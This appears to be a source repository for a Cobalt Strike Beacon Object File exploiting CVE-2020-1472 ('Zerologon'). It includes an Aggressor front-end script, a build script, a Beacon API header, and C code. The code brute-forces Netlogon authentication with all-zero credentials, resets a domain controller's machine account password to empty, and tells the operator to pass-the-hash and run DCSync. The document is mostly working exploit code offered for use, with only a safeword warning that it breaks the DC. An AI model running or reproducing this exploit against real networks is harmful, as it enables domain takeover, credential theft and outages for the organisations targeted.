├── LICENSE ├── dist ├── zerologon.cna ├── zerologon.x64.o └── zerologon.x86.o ├── make.bat └── src ├── beacon.h └── zerologon.c /LICENSE: -------------------------------------------------------------------------------- 1 | BSD 3-Clause License 2 | 3 | Copyright (c) 2020, Raphael Mudge 4 | All rights reserved. 5 | 6 | Redistribution and use in source and binary forms, with or without 7 | modification, are permitted provided that the following conditions are met: 8 | 9 | 1. Redistributions of source code must retain the above copyright notice, this 10 | list of conditions and the following disclaimer. 11 | 12 | 2. Redistributions in binary form must reproduce the above copyright notice, 13 | this list of conditions and the following disclaimer in the documentation 14 | and/or other materials provided with the distribution. 15 | 16 | 3. Neither the name of the copyright holder nor the names of its 17 | contributors may be used to endorse or promote products derived from 18 | this software without specific prior written permission. 19 | 20 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" 21 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 22 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 23 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 24 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 25 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 26 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 27 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 28 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 29 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 
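--------------------------------------------------------------------------------
/dist/zerologon.cna:
--------------------------------------------------------------------------------
# zerologon [safeword] [DC.fqdn]
#
# Aggressor front-end for the CVE-2020-1472 ("Zerologon") BOF.  It derives the
# three names the BOF's go() extracts (DC FQDN, DC NetBIOS name, DC machine
# account "NETBIOS$"), packs them as wide strings and runs the BOF in the
# selected Beacon.  A successful run resets the DC's machine account password,
# which breaks that domain controller (see the help text below) -- hence the
# safeword gate, which is checked before anything else happens.
alias zerologon {
	# $handle and $data were not in the original local() list and so leaked
	# into script-global scope; keep every working variable local.
	local('$bid $safew $fqdn $netbios $barch $handle $data $args');
	($bid, $safew, $fqdn) = @_;

	# safety check first: refuse to even read the BOF from disk until the
	# operator has acknowledged the warning in "help zerologon"
	if ($safew ne "iunderstand") {
		berror($bid, "zerologon aborted! Type help zerologon and read first.");
		return;
	}

	# an empty target would hand empty names to the Netlogon RPC calls
	if ($fqdn eq "") {
		berror($bid, "zerologon aborted! No DC FQDN given.");
		return;
	}

	# NetBIOS name = first DNS label of the FQDN (DC.corp.acme.com -> DC)
	$netbios = split("\\.", $fqdn)[0];

	# read the BOF object matching this session's architecture
	$barch  = barch($bid);
	$handle = openf(script_resource("zerologon. $+ $barch $+ .o"));
	$data   = readb($handle, -1);
	closef($handle);

	# three wide (UTF-16) strings, in exactly the order go() extracts them:
	# fqdn, netbios, machine account ('$' is single-quoted, so it is literal)
	$args = bof_pack($bid, "ZZZ", $fqdn, $netbios, $netbios . '$');

	# announce what we're doing, then run it
	btask($bid, "Reset $netbios $+ \$ machine account via CVE-2020-1472");
	beacon_inline_execute($bid, $data, "go", $args);
}

beacon_command_register(
	"zerologon",
	"Reset DC machine account password with CVE-2020-1472",
	"Synopsis: zerologon [safeword] [DC.fqdn]\n\nReset the machine account password for a domain controller with the\nZerologon exploit. \n\nThis exploit will break the functionality of this domain controller.\n\c4Don't use in production.\o Use \c0iunderstand\o as the safe word parameter\nto acknowledge that you read this.");
--------------------------------------------------------------------------------
/dist/zerologon.x64.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Cobalt-Strike/ZeroLogon-BOF/d080131331897c388a189d4aa76283afdd727617/dist/zerologon.x64.o
--------------------------------------------------------------------------------
/dist/zerologon.x86.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Cobalt-Strike/ZeroLogon-BOF/d080131331897c388a189d4aa76283afdd727617/dist/zerologon.x86.o
--------------------------------------------------------------------------------
/make.bat:
--------------------------------------------------------------------------------
@echo off
set PLAT="x86"
IF "%Platform%"=="x64" set PLAT="x64"

cl.exe /GS- /c src/zerologon.c /Fodist/zerologon.%PLAT%.o
--------------------------------------------------------------------------------
/src/beacon.h:
--------------------------------------------------------------------------------
/*
 * Beacon Object Files (BOF)
 * -------------------------
 * A Beacon Object File is a light-weight post exploitation tool that runs
 * with Beacon's inline-execute command.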
6 | */ 7 | 8 | /* data API */ 9 | typedef struct { 10 | char * original; /* the original buffer [so we can free it] */ 11 | char * buffer; /* current pointer into our buffer */ 12 | int length; /* remaining length of data */ 13 | int size; /* total size of this buffer */ 14 | } datap; 15 | 16 | DECLSPEC_IMPORT void BeaconDataParse(datap * parser, char * buffer, int size); 17 | DECLSPEC_IMPORT char * BeaconDataPtr(datap * parser, int size); 18 | DECLSPEC_IMPORT int BeaconDataInt(datap * parser); 19 | DECLSPEC_IMPORT short BeaconDataShort(datap * parser); 20 | DECLSPEC_IMPORT int BeaconDataLength(datap * parser); 21 | DECLSPEC_IMPORT char * BeaconDataExtract(datap * parser, int * size); 22 | 23 | /* format API */ 24 | typedef struct { 25 | char * original; /* the original buffer [so we can free it] */ 26 | char * buffer; /* current pointer into our buffer */ 27 | int length; /* remaining length of data */ 28 | int size; /* total size of this buffer */ 29 | } formatp; 30 | 31 | DECLSPEC_IMPORT void BeaconFormatAlloc(formatp * format, int maxsz); 32 | DECLSPEC_IMPORT void BeaconFormatReset(formatp * format); 33 | DECLSPEC_IMPORT void BeaconFormatFree(formatp * format); 34 | DECLSPEC_IMPORT void BeaconFormatAppend(formatp * format, char * text, int len); 35 | DECLSPEC_IMPORT void BeaconFormatPrintf(formatp * format, char * fmt, ...); 36 | DECLSPEC_IMPORT char * BeaconFormatToString(formatp * format, int * size); 37 | DECLSPEC_IMPORT void BeaconFormatInt(formatp * format, int value); 38 | 39 | /* Output Functions */ 40 | #define CALLBACK_OUTPUT 0x0 41 | #define CALLBACK_PENDING 0x16 42 | #define CALLBACK_OUTPUT_OEM 0x1e 43 | #define CALLBACK_ERROR 0x0d 44 | #define CALLBACK_OUTPUT_UTF8 0x20 45 | 46 | DECLSPEC_IMPORT void BeaconPrintf(int type, char * fmt, ...); 47 | DECLSPEC_IMPORT void BeaconOutput(int type, char * data, int len); 48 | DECLSPEC_IMPORT void BeaconErrorD(int msg, int arg); 49 | DECLSPEC_IMPORT void BeaconErrorDD(int msg, int arg, int arg2); 50 | 
DECLSPEC_IMPORT void BeaconErrorNA(int msg); 51 | DECLSPEC_IMPORT void BeaconDebug(char * fmt, ...); 52 | 53 | /* Token Functions */ 54 | DECLSPEC_IMPORT BOOL BeaconUseToken(HANDLE token); 55 | DECLSPEC_IMPORT void BeaconRevertToken(); 56 | DECLSPEC_IMPORT BOOL BeaconIsAdmin(); 57 | 58 | /* Spawn+Inject Functions */ 59 | DECLSPEC_IMPORT void BeaconGetSpawnTo(BOOL x86, char * buffer, int length); 60 | DECLSPEC_IMPORT void BeaconInjectTemporaryProcess(PROCESS_INFORMATION * pInfo, char * payload, int p_len, int p_offset, char * arg, int a_len); 61 | DECLSPEC_IMPORT void BeaconCleanupProcess(PROCESS_INFORMATION * pInfo); 62 | 63 | /* Utility Functions */ 64 | DECLSPEC_IMPORT BOOL toWideChar(char * src, wchar_t * dst, int max); 65 | 66 | /* Spawn and Inject */ 67 | //DECLSPEC_IMPORT void BeaconSpawnJob(int type, int wait, int offset, char * payload, int payload_length, char * argument, int argument_length, char * description, int description_length, BOOL x86, BOOL ignoreToken); 68 | //DECLSPEC_IMPORT void BeaconInject(HANDLE handle, char * shellcode, int shellcode_length, int shellcode_offset, char * arguments, int argument_length); 69 | 70 | /* Execute Programs */ 71 | //DECLSPEC_IMPORT BOOL BeaconExecute(char * command, int commandlength, STARTUPINFO * si, PROCESS_INFORMATION * pi, DWORD flags, BOOL ignoreToken); 72 | //DECLSPEC_IMPORT void BeaconExecuteCleanup(PROCESS_INFORMATION * pi); 73 | 74 | /* Job related APIs */ 75 | //DECLSPEC_IMPORT void BeaconWatchHandle(HANDLE readme, DWORD pid, DWORD type, char * description); 76 | //DECLSPEC_IMPORT void BeaconWatchPipe(char * pipe, DWORD pid, DWORD type, char * description); 77 | 78 | /* Win32 APIs */ 79 | DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$AllocateAndInitializeSid(PSID_IDENTIFIER_AUTHORITY pIdentifierAuthority, BYTE nSubAuthorityCount, DWORD nSubAuthority0, DWORD nSubAuthority1, DWORD nSubAuthority2, DWORD nSubAuthority3, DWORD nSubAuthority4, DWORD nSubAuthority5, DWORD nSubAuthority6, DWORD nSubAuthority7, PSID 
*pSid); 80 | DECLSPEC_IMPORT BOOL APIENTRY ADVAPI32$CheckTokenMembership(HANDLE hToken, PSID pSid, PBOOL isMember); 81 | DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$CloseServiceHandle(SC_HANDLE hSCObject); 82 | DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$CreateProcessWithLogonW(LPCWSTR, LPCWSTR, LPCWSTR, DWORD, LPCWSTR, LPWSTR, DWORD, LPVOID, LPCWSTR, LPSTARTUPINFOW, LPPROCESS_INFORMATION); 83 | DECLSPEC_IMPORT BOOL APIENTRY ADVAPI32$CreateRestrictedToken(HANDLE, DWORD, DWORD, PSID_AND_ATTRIBUTES, DWORD, PLUID_AND_ATTRIBUTES, DWORD, PSID_AND_ATTRIBUTES, PHANDLE); 84 | DECLSPEC_IMPORT SC_HANDLE WINAPI ADVAPI32$CreateServiceA(SC_HANDLE hSCManager, LPCSTR lpServiceName, LPCSTR lpDisplayName, DWORD dwDesiredAccess, DWORD dwServiceType, DWORD dwStartType, DWORD dwErrorControl, LPCSTR lpBinaryPathName, LPCSTR lpLoadOrderGroup, LPDWORD lpdwTagId, LPCSTR lpDependencies, LPCSTR lpServiceStartName, LPCSTR lpPassword); 85 | DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$DeleteService(SC_HANDLE hService); 86 | DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$DuplicateTokenEx(HANDLE, DWORD, LPSECURITY_ATTRIBUTES, SECURITY_IMPERSONATION_LEVEL, TOKEN_TYPE, PHANDLE); 87 | DECLSPEC_IMPORT PVOID WINAPI ADVAPI32$FreeSid(PSID pSid); 88 | DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$GetTokenInformation(HANDLE, TOKEN_INFORMATION_CLASS, LPVOID, DWORD, PDWORD); 89 | DECLSPEC_IMPORT PDWORD WINAPI ADVAPI32$GetSidSubAuthority(PSID, DWORD); 90 | DECLSPEC_IMPORT PUCHAR WINAPI ADVAPI32$GetSidSubAuthorityCount(PSID); 91 | DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$ImpersonateLoggedOnUser(HANDLE); 92 | DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$LookupAccountSidA(LPCSTR, PSID, LPSTR, LPDWORD, LPSTR, LPDWORD, PSID_NAME_USE); 93 | DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$OpenProcessToken(HANDLE, DWORD, PHANDLE); 94 | DECLSPEC_IMPORT SC_HANDLE WINAPI ADVAPI32$OpenSCManagerA(LPCSTR lpMachineName, LPCSTR lpDatabaseName, DWORD dwDesiredAccess); 95 | DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$QueryServiceStatus(SC_HANDLE hService, LPSERVICE_STATUS lpServiceStatus); 96 
| DECLSPEC_IMPORT LSTATUS APIENTRY ADVAPI32$RegEnumKeyA(HKEY hKey, DWORD dwIndex, LPSTR lpName, DWORD cchName); 97 | DECLSPEC_IMPORT LSTATUS APIENTRY ADVAPI32$RegEnumValueA(HKEY hKey, DWORD dwIndex, LPSTR lpValueName, LPDWORD lpcchValueName, LPDWORD lpReserved, LPDWORD lpType, LPBYTE lpData, LPDWORD lpcbData); 98 | DECLSPEC_IMPORT LSTATUS APIENTRY ADVAPI32$RegOpenCurrentUser(REGSAM samDesired, PHKEY phkResult); 99 | DECLSPEC_IMPORT LSTATUS APIENTRY ADVAPI32$RegOpenKeyExA(HKEY, LPCSTR, DWORD, REGSAM, PHKEY); 100 | DECLSPEC_IMPORT LSTATUS APIENTRY ADVAPI32$RegQueryValueExA(HKEY, LPCSTR, LPDWORD, LPDWORD, LPBYTE, LPDWORD); 101 | DECLSPEC_IMPORT LSTATUS APIENTRY ADVAPI32$RegCloseKey(HKEY); 102 | DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$RevertToSelf(); 103 | DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$SetTokenInformation(HANDLE, TOKEN_INFORMATION_CLASS, LPVOID, DWORD); 104 | DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$StartServiceA(SC_HANDLE hService, DWORD dwNumServiceArgs, LPCSTR *lpServiceArgVectors); 105 | 106 | DECLSPEC_IMPORT BOOL WINAPI KERNEL32$CloseHandle(HANDLE); 107 | DECLSPEC_IMPORT HANDLE WINAPI KERNEL32$CreateFileA(LPCSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES lpSecurityAttributes, DWORD dwCreationDisposition, DWORD dwFlagsAndAttributes, HANDLE hTemplateFile); 108 | DECLSPEC_IMPORT HANDLE WINAPI KERNEL32$CreateRemoteThread(HANDLE hProcess, LPSECURITY_ATTRIBUTES lpThreadAttributes, SIZE_T dwStackSize, LPTHREAD_START_ROUTINE lpStartAddress, LPVOID lpParameter, DWORD dwCreationFlags, LPDWORD lpThreadId); 109 | DECLSPEC_IMPORT HANDLE WINAPI KERNEL32$CreateToolhelp32Snapshot(DWORD, DWORD); 110 | DECLSPEC_IMPORT BOOL WINAPI KERNEL32$DuplicateHandle(HANDLE, HANDLE, HANDLE, LPHANDLE, DWORD, BOOL, DWORD); 111 | DECLSPEC_IMPORT DWORD WINAPI KERNEL32$GetCurrentDirectoryW(DWORD, LPWSTR); 112 | DECLSPEC_IMPORT BOOL WINAPI KERNEL32$GetFileTime(HANDLE hFile, LPFILETIME lpCreationTime, LPFILETIME lpLastAccessTime, LPFILETIME lpLastWriteTime); 113 | 
DECLSPEC_IMPORT DWORD WINAPI KERNEL32$GetModuleFileNameA(HMODULE, LPSTR, DWORD); 114 | DECLSPEC_IMPORT HANDLE WINAPI KERNEL32$GetCurrentProcess(); 115 | DECLSPEC_IMPORT DWORD WINAPI KERNEL32$GetCurrentProcessId(); 116 | DECLSPEC_IMPORT UINT WINAPI KERNEL32$GetSystemWindowsDirectoryA(LPSTR, UINT); 117 | DECLSPEC_IMPORT DWORD WINAPI KERNEL32$GetLastError(); 118 | DECLSPEC_IMPORT DWORD WINAPI KERNEL32$GetProcessId(HANDLE); 119 | DECLSPEC_IMPORT DWORD WINAPI KERNEL32$GetTickCount(); 120 | DECLSPEC_IMPORT HLOCAL WINAPI KERNEL32$LocalAlloc(UINT, SIZE_T); 121 | DECLSPEC_IMPORT HLOCAL WINAPI KERNEL32$LocalFree(HLOCAL); 122 | DECLSPEC_IMPORT HANDLE WINAPI KERNEL32$OpenProcess(DWORD, BOOL, DWORD); 123 | DECLSPEC_IMPORT BOOL WINAPI KERNEL32$Process32First(HANDLE, void *); 124 | DECLSPEC_IMPORT BOOL WINAPI KERNEL32$Process32Next(HANDLE, void *); 125 | DECLSPEC_IMPORT BOOL WINAPI KERNEL32$ProcessIdToSessionId(DWORD, DWORD *); 126 | DECLSPEC_IMPORT BOOL WINAPI KERNEL32$ReadProcessMemory(HANDLE hProcess, LPCVOID lpBaseAddress, LPVOID lpBuffer, SIZE_T nSize, SIZE_T * lpNumberOfBytesRead); 127 | DECLSPEC_IMPORT BOOL WINAPI KERNEL32$SetFileTime(HANDLE hFile, CONST FILETIME *lpCreationTime, CONST FILETIME *lpLastAccessTime, CONST FILETIME *lpLastWriteTime); 128 | DECLSPEC_IMPORT VOID WINAPI KERNEL32$Sleep(DWORD); 129 | DECLSPEC_IMPORT BOOL WINAPI KERNEL32$TerminateProcess(HANDLE, UINT); 130 | DECLSPEC_IMPORT LPVOID WINAPI KERNEL32$VirtualAllocEx(HANDLE hProcess, LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect); 131 | DECLSPEC_IMPORT DWORD WINAPI KERNEL32$WaitForSingleObject(HANDLE, DWORD); 132 | DECLSPEC_IMPORT BOOL WINAPI KERNEL32$WriteProcessMemory(HANDLE hProcess, LPVOID lpBaseAddress, LPCVOID lpBuffer, SIZE_T nSize, SIZE_T * lpNumberOfBytesWritten); 133 | 134 | DECLSPEC_IMPORT DWORD WINAPI NETAPI32$DsGetDcNameA(LPVOID, LPVOID, LPVOID, LPVOID, ULONG, LPVOID); 135 | DECLSPEC_IMPORT DWORD WINAPI NETAPI32$NetApiBufferFree(LPVOID); 136 | 137 | typedef enum 
_OBJECT_INFORMATION_CLASS { 138 | ObjectBasicInformation, ObjectNameInformation, ObjectTypeInformation, ObjectAllTypesInformation, ObjectHandleInformation 139 | } OBJECT_INFORMATION_CLASS; 140 | 141 | DECLSPEC_IMPORT NTSTATUS NTAPI NTDLL$NtDuplicateObject(HANDLE, HANDLE *, HANDLE, HANDLE *, ACCESS_MASK, BOOLEAN, ULONG); 142 | DECLSPEC_IMPORT NTSTATUS NTAPI NTDLL$NtQueryObject(HANDLE, OBJECT_INFORMATION_CLASS, PVOID, ULONG, PULONG); 143 | DECLSPEC_IMPORT NTSTATUS NTAPI NTDLL$NtQuerySystemInformation(SYSTEM_INFORMATION_CLASS, PVOID, ULONG, PULONG); 144 | DECLSPEC_IMPORT NTSTATUS WINAPI NTDLL$RtlAdjustPrivilege(ULONG Privilege, BOOL Enable, BOOL CurrentThread, PULONG pPreviousState); 145 | DECLSPEC_IMPORT BOOLEAN NTAPI NTDLL$RtlEqualUnicodeString(void *, void *, BOOLEAN); 146 | DECLSPEC_IMPORT VOID NTAPI NTDLL$RtlInitUnicodeString(PUNICODE_STRING, PCWSTR); 147 | 148 | DECLSPEC_IMPORT HRESULT WINAPI OLE32$CLSIDFromString(wchar_t * lpsz, LPCLSID pclsid); 149 | DECLSPEC_IMPORT HRESULT WINAPI OLE32$CoGetObject(wchar_t *, BIND_OPTS *, REFIID, void **ppv); 150 | DECLSPEC_IMPORT HRESULT WINAPI OLE32$CoInitializeEx(LPVOID, DWORD); 151 | DECLSPEC_IMPORT HRESULT WINAPI OLE32$IIDFromString(wchar_t * lpsz, LPIID lpiid); 152 | 153 | DECLSPEC_IMPORT NTSTATUS NTAPI SECUR32$LsaCallAuthenticationPackage(HANDLE, ULONG, PVOID, ULONG, PVOID, PULONG, PNTSTATUS); 154 | DECLSPEC_IMPORT NTSTATUS NTAPI SECUR32$LsaConnectUntrusted(PHANDLE); 155 | DECLSPEC_IMPORT NTSTATUS NTAPI SECUR32$LsaDeregisterLogonProcess(HANDLE); 156 | DECLSPEC_IMPORT NTSTATUS NTAPI SECUR32$LsaLookupAuthenticationPackage(HANDLE, void *, PULONG); 157 | 158 | DECLSPEC_IMPORT BOOL WINAPI SHELL32$ShellExecuteExA(LPSHELLEXECUTEINFOA); 159 | -------------------------------------------------------------------------------- /src/zerologon.c: -------------------------------------------------------------------------------- 1 | /* 2 | * Port of SharpZeroLogon to a Beacon Object File 3 | * 
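https://github.com/nccgroup/nccfsas/tree/main/Tools/SharpZeroLogon
 *
 * Drives the CVE-2020-1472 ("Zerologon") Netlogon authentication bypass
 * against a single domain controller and, once a secure channel is
 * established with an all-zero client credential, sets that DC's machine
 * account password to the empty string.  The accompanying Aggressor script
 * warns that this breaks the DC; the operator is expected to restore the
 * original machine account password afterwards.
 *
 * BOF constraints observed here: no CRT calls, no writable globals, Win32
 * functions resolved through the MODULE$Function import convention.
 */

/*
 * NOTE(review): the names of the three system headers on the original
 * include lines did not survive extraction (they appear as bare "#include").
 * <windows.h> is the minimum the code below needs; <stdio.h> is the usual BOF
 * template companion.  Restore the exact set from the upstream source before
 * rebuilding with make.bat.
 */
#include <windows.h>
#include <stdio.h>
#include "beacon.h"

/* Wire structures for the Netlogon RPC calls, declared locally so that no
 * additional SDK header is required. */
typedef struct _NETLOGON_CREDENTIAL {
    CHAR data[8];
} NETLOGON_CREDENTIAL, *PNETLOGON_CREDENTIAL;

typedef struct _NETLOGON_AUTHENTICATOR {
    NETLOGON_CREDENTIAL Credential;
    DWORD Timestamp;
} NETLOGON_AUTHENTICATOR, *PNETLOGON_AUTHENTICATOR;

typedef enum _NETLOGON_SECURE_CHANNEL_TYPE {
    NullSecureChannel = 0,
    MsvApSecureChannel = 1,
    WorkstationSecureChannel = 2,
    TrustedDnsDomainSecureChannel = 3,
    TrustedDomainSecureChannel = 4,
    UasServerSecureChannel = 5,
    ServerSecureChannel = 6,
    CdcServerSecureChannel = 7
} NETLOGON_SECURE_CHANNEL_TYPE;

typedef struct _NL_TRUST_PASSWORD {
    WCHAR Buffer[256];
    ULONG Length;
} NL_TRUST_PASSWORD, *PNL_TRUST_PASSWORD;

/* netapi32.dll exports for the Netlogon challenge / authenticate / password-set
 * sequence (the NETAPI32$ prefix is the BOF dynamic-function-resolution
 * convention).  All three return an NTSTATUS; 0 means success. */
DECLSPEC_IMPORT NTSTATUS NETAPI32$I_NetServerReqChallenge(LPWSTR PrimaryName, LPWSTR ComputerName, PNETLOGON_CREDENTIAL ClientChallenge, PNETLOGON_CREDENTIAL ServerChallenge);
DECLSPEC_IMPORT NTSTATUS NETAPI32$I_NetServerAuthenticate2(LPWSTR PrimaryName, LPWSTR AccountName, NETLOGON_SECURE_CHANNEL_TYPE AccountType, LPWSTR ComputerName, PNETLOGON_CREDENTIAL ClientCredential, PNETLOGON_CREDENTIAL ServerCredential, PULONG NegotiatedFlags);
DECLSPEC_IMPORT NTSTATUS NETAPI32$I_NetServerPasswordSet2(LPWSTR PrimaryName, LPWSTR AccountName, NETLOGON_SECURE_CHANNEL_TYPE AccountType, LPWSTR ComputerName, PNETLOGON_AUTHENTICATOR Authenticator, PNETLOGON_AUTHENTICATOR ReturnAuthenticator, PNL_TRUST_PASSWORD ClearNewPassword);

enum {
    /* Upper bound on authentication attempts.  The attack is probabilistic
     * (per the public CVE-2020-1472 analysis roughly one attempt in 256
     * succeeds against a vulnerable DC), so a couple of thousand tries keeps
     * the chance of a false "not vulnerable" well below one percent. */
    ZEROLOGON_MAX_ATTEMPTS = 2000
};

/*
 * BOF entry point.
 *
 * args/alen: Beacon argument pack built by zerologon.cna with bof_pack("ZZZ"):
 *            three wide strings -- DC FQDN, DC NetBIOS name, DC machine
 *            account ("NETBIOS$") -- in that order.
 *
 * Output goes back to the operator through BeaconPrintf:
 *   - success: the machine account password is now empty; the message gives
 *     the NT hash of the empty password for a pass-the-hash + DCSync follow-up
 *   - a challenge failure: the DC could not be reached / did not answer the
 *     Netlogon call, which is NOT evidence about the vulnerability
 *   - "not vulnerable": every attempt was rejected
 */
void go(char * args, int alen) {
    /* client_ch, auth and new_pass are deliberately left all-zero: a zero
     * client challenge, a zero client credential/authenticator and a
     * zero-length new password ARE the CVE-2020-1472 payload.  Do not
     * "fix" them by initialising them with random data. */
    NETLOGON_CREDENTIAL client_ch = {0};
    NETLOGON_CREDENTIAL server_ch = {0};
    NETLOGON_AUTHENTICATOR auth = {0};
    NETLOGON_AUTHENTICATOR auth_ret = {0};
    NL_TRUST_PASSWORD new_pass = {0};
    /* Flag set carried over from SharpZeroLogon.  It is an in/out parameter
     * and is intentionally not reset between attempts, so whatever the server
     * writes back is reused on the next try. */
    ULONG negotiate_flags = 0x212fffff;
    NTSTATUS status;
    DWORD attempt;

    datap parser;
    wchar_t * dc_fqdn;     /* DC.corp.acme.com */
    wchar_t * dc_netbios;  /* DC */
    wchar_t * dc_account;  /* DC$ */

    /* extract our arguments, in the order the .cna packed them */
    BeaconDataParse(&parser, args, alen);
    dc_fqdn    = (wchar_t *)BeaconDataExtract(&parser, NULL);
    dc_netbios = (wchar_t *)BeaconDataExtract(&parser, NULL);
    dc_account = (wchar_t *)BeaconDataExtract(&parser, NULL);

    /* A short or malformed argument pack must not reach the RPC calls as
     * NULL names; fail loudly instead of crashing the Beacon. */
    if (dc_fqdn == NULL || dc_netbios == NULL || dc_account == NULL) {
        BeaconPrintf(CALLBACK_ERROR, "zerologon: expected three wide-string arguments (DC fqdn, DC netbios name, DC machine account)");
        return;
    }

    for (attempt = 0; attempt < ZEROLOGON_MAX_ATTEMPTS; attempt++) {
        /* Step 1: obtain a server challenge.  Without it there is nothing to
         * authenticate against, so an RPC failure here is a connectivity or
         * naming problem and retrying 2000 times would only hang the session
         * and then misreport the DC as "not vulnerable". */
        status = NETAPI32$I_NetServerReqChallenge(dc_fqdn, dc_netbios, &client_ch, &server_ch);
        if (status != 0) {
            BeaconPrintf(CALLBACK_ERROR, "Could not obtain a Netlogon challenge from %S (status 0x%lx); check the DC name/reachability before drawing any conclusion about CVE-2020-1472", dc_fqdn, (unsigned long)status);
            return;
        }

        /* Step 2: authenticate with the all-zero client credential.  Against a
         * vulnerable DC this is accepted on a fraction of attempts; rejection
         * is the normal case, so just try again. */
        status = NETAPI32$I_NetServerAuthenticate2(dc_fqdn, dc_account, ServerSecureChannel, dc_netbios, &client_ch, &server_ch, &negotiate_flags);
        if (status != 0) {
            continue;
        }

        /* Step 3: we hold a secure channel; set the DC machine account
         * password to the empty string.  From this point the DC's AD-stored
         * password no longer matches its local secret -- the "breaks the DC"
         * warning in the .cna refers to this. */
        status = NETAPI32$I_NetServerPasswordSet2(dc_fqdn, dc_account, ServerSecureChannel, dc_netbios, &auth, &auth_ret, &new_pass);
        if (status == 0) {
            /* 31d6cfe0d16ae931b73c59d7e0c089c0 is the NT hash of the empty password */
            BeaconPrintf(CALLBACK_OUTPUT, "Success! Use pth .\\%S 31d6cfe0d16ae931b73c59d7e0c089c0 and run dcsync", dc_account);
        }
        else {
            BeaconPrintf(CALLBACK_ERROR, "Failed to set machine account pass for %S (status 0x%lx)", dc_account, (unsigned long)status);
        }

        /* one authenticated session is all we get to try; stop either way */
        return;
    }

    BeaconPrintf(CALLBACK_ERROR, "%S is not vulnerable (no Netlogon authentication accepted in %lu attempts)", dc_fqdn, (unsigned long)ZEROLOGON_MAX_ATTEMPTS);
}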